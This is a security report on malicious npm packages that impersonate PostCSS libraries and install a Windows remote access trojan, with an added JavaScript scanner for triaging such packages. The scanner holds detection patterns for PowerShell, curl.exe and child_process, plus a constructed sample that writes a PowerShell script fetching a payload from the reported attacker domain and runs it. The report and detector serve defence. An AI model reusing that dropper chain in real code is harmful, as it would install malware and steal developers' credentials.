Recent investigations have uncovered a series of malicious npm packages designed to deploy a Windows-based remote access trojan (RAT). These packages, namely aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser, have collectively amassed over 1,000 downloads. They were published over the past month by an npm user identified as “abdrizak” and remain available for download.
These packages impersonate legitimate PostCSS tools to deceive developers. For instance, postcss-minify-selector-parser mimics the widely used postcss-selector-parser library, which boasts over 127 million weekly downloads. Despite their benign appearance, installing any of these packages initiates a multi-stage attack leading to the deployment of the same Windows malware.
The attack sequence begins with a JavaScript dropper embedded within the package. Upon execution, this dropper writes a PowerShell script named settings.ps1 to the disk and runs it. The PowerShell script then downloads a ZIP archive from an external server (nvidiadriver[.]net) using curl.exe. This archive contains several components: a Visual Basic Script (update.vbs), a Python runtime, a Python loader script (loader.py), and multiple Python extension modules compiled with Nuitka.
The Visual Basic Script sets up the Python environment on the compromised system and executes the loader.py script, which activates the core functionality of the RAT. This malware is capable of gathering host information, extracting credentials from Google Chrome, collecting data from Chrome extensions, executing shell commands, and transferring files to and from a command-and-control (C2) server located at 95.216.92[.]207:8080.
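The dropper chain described above (a JavaScript stage that writes settings.ps1, runs it through PowerShell, and fetches a second stage with curl.exe) can be triaged statically before a package is ever installed. The following is an added example, not code from the report or from any package it names; it assumes the package has already been unpacked to a directory, and it treats npm lifecycle scripts as the likely execution trigger, which the report does not state explicitly.

```javascript
// Added triage example (not from the report or from npm): a static check that flags the
// dropper behaviour described above. Package names and network indicators are the ones
// named in the report; the sample package contents below are constructed for this example.
const KNOWN_BAD_NAMES = new Set([
  'aes-decode-runner-pro', 'postcss-minify-selector', 'postcss-minify-selector-parser',
]);
const NETWORK_IOCS = ['nvidiadriver.net', 'nvidiadriver[.]net', '95.216.92.207', '95.216.92[.]207'];
const DROPPER_PATTERNS = [
  { id: 'child_process', re: /require\(['"]child_process['"]\)/ },   // spawning a shell from JS
  { id: 'powershell-invocation', re: /powershell(\.exe)?\b/i },     // settings.ps1 is run via PowerShell
  { id: 'ps1-write', re: /writeFileSync\([^)]*\.ps1/i },            // dropper writes a .ps1 to disk
  { id: 'curl-exe', re: /curl\.exe/i },                             // second stage fetched with curl.exe
];
// pkg: parsed package.json; files: { relativePath: sourceText }. Returns a list of findings.
function scanPackage(pkg, files) {
  const findings = [];
  if (KNOWN_BAD_NAMES.has(pkg.name)) findings.push({ kind: 'known-malicious-name', detail: pkg.name });
  for (const hook of ['preinstall', 'install', 'postinstall']) {  // code that runs on `npm install`
    if (pkg.scripts && pkg.scripts[hook]) findings.push({ kind: 'lifecycle-script', detail: `${hook}: ${pkg.scripts[hook]}` });
  }
  for (const [path, src] of Object.entries(files)) {
    for (const p of DROPPER_PATTERNS) if (p.re.test(src)) findings.push({ kind: p.id, detail: path });
    for (const ioc of NETWORK_IOCS) if (src.includes(ioc)) findings.push({ kind: 'network-ioc', detail: `${path}: ${ioc}` });
  }
  return findings;
}
// A known name or a reported C2 indicator is enough to block; an install hook that
// also reaches for PowerShell is suspicious enough to hold for manual review.
function verdict(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has('known-malicious-name') || kinds.has('network-ioc')) return 'block';
  if (kinds.has('lifecycle-script') && (kinds.has('powershell-invocation') || kinds.has('ps1-write'))) return 'review';
  return 'ok';
}
// Constructed sample modelled on the described dropper chain (not the real package contents).
const SAMPLE_PKG = { name: 'postcss-minify-selector-parser', version: '1.0.0', scripts: { postinstall: 'node index.js' } };
const SAMPLE_FILES = {
  'index.js': [
    "const { execSync } = require('child_process');",
    "require('fs').writeFileSync('settings.ps1', 'curl.exe -o stage2.zip https://nvidiadriver[.]net/stage2.zip');",
    "execSync('powershell -File settings.ps1');",
  ].join('\n'),
};
const BENIGN_PKG = { name: 'postcss-selector-parser', version: '6.0.0' };
const BENIGN_FILES = { 'index.js': "module.exports = (s) => s.trim();" };
console.log(verdict(scanPackage(SAMPLE_PKG, SAMPLE_FILES)));  // block
console.log(verdict(scanPackage(BENIGN_PKG, BENIGN_FILES)));  // ok
```

The pattern list is deliberately narrow to the chain this report describes; a real pre-install gate would combine it with registry metadata (publisher age, download history) and an allowlist of the genuine PostCSS package names.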
The RAT’s capabilities are facilitated by several Python native extension modules:
config.pyd: Contains constants, command IDs, C2 URLs, and registry key names.
api.pyd: Manages HTTP C2 packet exchanges.
audiodriver.pyd: Oversees the main RAT orchestration loop.
command.pyd: Profiles the host, performs virtual machine checks, handles file transfers, and executes shell commands.
auto.pyd: Extracts Chrome credentials and extension data, bypassing app-bound encryption protections.
util.pyd: Functions as a helper for tar/gzip archives.
This incident underscores the growing trend of attackers leveraging seemingly innocuous packages to infiltrate systems. By disguising malicious code within packages that appear related to legitimate tools with substantial usage, attackers can exploit the trust developers place in these resources. It serves as a stark reminder for developers to exercise caution when incorporating new packages into their projects, especially those that closely resemble popular libraries.
In the broader context, this discovery aligns with other recent campaigns targeting the npm and TypeScript ecosystems. For example, a malicious package named apintergrationpost was found to deliver a full-featured Linux RAT called MYRA, while another package, @withgoogle/stitch-sdk, impersonated Google’s SDK to distribute malware. These incidents highlight the persistent threats within the software supply chain and the need for vigilant security practices.
As the software development community continues to rely heavily on open-source packages, the importance of thorough vetting and monitoring of dependencies cannot be overstated. Implementing automated tools to detect anomalies, maintaining an updated list of trusted packages, and staying informed about emerging threats are crucial steps in safeguarding development environments against such sophisticated attacks.